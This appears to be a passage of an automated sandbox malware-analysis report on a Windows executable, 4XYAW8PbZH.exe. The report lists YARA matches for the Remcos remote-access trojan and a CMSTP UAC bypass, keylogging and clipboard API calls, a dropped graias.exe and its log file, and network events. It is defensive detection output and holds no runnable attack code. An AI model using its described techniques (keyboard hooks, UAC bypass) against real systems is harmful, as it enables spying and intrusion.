                Source: unknownNetwork traffic detected: HTTP traffic on port 50605 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50623
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                Source: unknownNetwork traffic detected: HTTP traffic on port 50658 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50605
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50584
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
                Source: unknownNetwork traffic detected: HTTP traffic on port 50623 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000003_2_004099E4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Graias\graias.exe
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_00409B10
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BB81 SystemParametersInfoW,3_2_0041BB81
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BB87 SystemParametersInfoW,3_2_0041BB87
                Source: chrome.exeProcess created: 99

                System Summary

                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004158B9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_00DFE5A40_2_00DFE5A4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F140D00_2_04F140D0
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F16EFE0_2_04F16EFE
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F198CC0_2_04F198CC
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F129180_2_04F12918
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F123680_2_04F12368
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F123570_2_04F12357
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F198C40_2_04F198C4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F17A300_2_04F17A30
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F1ABF20_2_04F1ABF2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DE6C00_2_054DE6C0
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054D30D80_2_054D30D8
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DE2880_2_054DE288
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DDE500_2_054DDE50
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DF9600_2_054DF960
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DDA180_2_054DDA18
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004520E23_2_004520E2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041D0813_2_0041D081
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043D0A83_2_0043D0A8
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004371603_2_00437160
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004361BA3_2_004361BA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004262643_2_00426264
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004313873_2_00431387
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043652C3_2_0043652C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041E5EF3_2_0041E5EF
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0044C7493_2_0044C749
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004367D63_2_004367D6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004267DB3_2_004267DB
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043C9ED3_2_0043C9ED
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00432A593_2_00432A59
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00436A9D3_2_00436A9D
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043CC1C3_2_0043CC1C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00436D583_2_00436D58
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00434D323_2_00434D32
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043CE4B3_2_0043CE4B
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00440E303_2_00440E30
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00426E833_2_00426E83
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00412F453_2_00412F45
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00452F103_2_00452F10
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00426FBD3_2_00426FBD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_013BE5A48_2_013BE5A4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 004020E7 appears 39 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 00433FC0 appears 55 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1831640723.0000000002A92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1830117697.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1838155676.0000000005230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1831640723.00000000029C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1841857834.00000000073D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000000.1645997748.00000000005B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametYfl.exe8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000003.00000002.1676941633.000000000111F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameLMEMH vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exeBinary or memory string: OriginalFilenametYfl.exe8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4XYAW8PbZH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: graias.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, aZ6hBXs8b9snu0Ud4p.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, aZ6hBXs8b9snu0Ud4p.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@461/91@25/7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00416AB7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,3_2_0040E219
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041A64F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BD4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4XYAW8PbZH.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
